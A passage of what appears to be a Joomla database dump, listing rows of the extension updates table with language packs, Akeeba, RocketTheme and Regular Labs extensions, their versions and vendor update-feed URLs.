package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(20569,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20570,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20571,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20572,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20573,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20574,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20575,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20576,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20577,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20578,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20579,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20580,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20581,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20582,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20583,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20584,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20585,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20586,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20587,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20588,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20589,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20590,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20591,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20592,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20593,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20594,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20595,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20596,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20597,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20598,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20599,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20600,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20601,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20602,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20603,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20604,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20605,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20606,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20607,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20608,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20609,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20610,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20611,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20612,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20613,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20614,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20615,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20616,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20617,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20618,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(20619,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(20620,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(20621,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(20622,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(20623,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(20624,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(20625,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(20626,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(20627,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20628,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20629,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20630,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20631,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20632,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20633,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20634,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20635,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20636,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20637,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20638,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20639,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20640,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20641,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20642,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20643,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20644,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20645,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20646,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20647,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20648,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20649,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20650,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20651,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20652,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20653,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20654,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20655,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20656,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20657,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20658,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20659,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20660,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20661,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20662,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20663,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20664,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20665,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20666,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20667,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20668,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20669,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20670,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20671,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20672,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20673,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20674,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20675,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20676,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(20677,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(20678,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(20680,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20681,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20682,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20683,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20684,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20685,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20686,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20687,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20688,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20689,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20690,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20691,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20692,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20693,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20694,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20695,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20696,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20697,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20698,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20699,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20700,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20701,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20702,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20703,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20704,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20705,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20706,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20707,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20708,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20709,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20710,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20711,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20712,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20713,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20714,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20715,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20716,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20717,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20718,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20719,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20720,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20721,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20722,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20723,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20724,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20725,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20726,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20727,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20728,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20729,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(20730,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(20731,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(20732,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20733,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20734,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20735,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20736,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20737,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20738,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20739,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20740,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20741,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20742,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20743,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20744,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20745,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20746,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20747,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20748,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20749,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20750,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20751,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20752,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20753,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20754,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20755,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20756,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20757,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20758,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20759,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20760,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20761,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20762,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20763,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20764,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20765,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20766,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20767,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20768,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20769,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20770,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20771,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20772,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20773,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20774,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20775,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20776,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20777,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20778,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20779,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20780,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20781,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20782,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20783,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(20784,20,0,'RokCommon 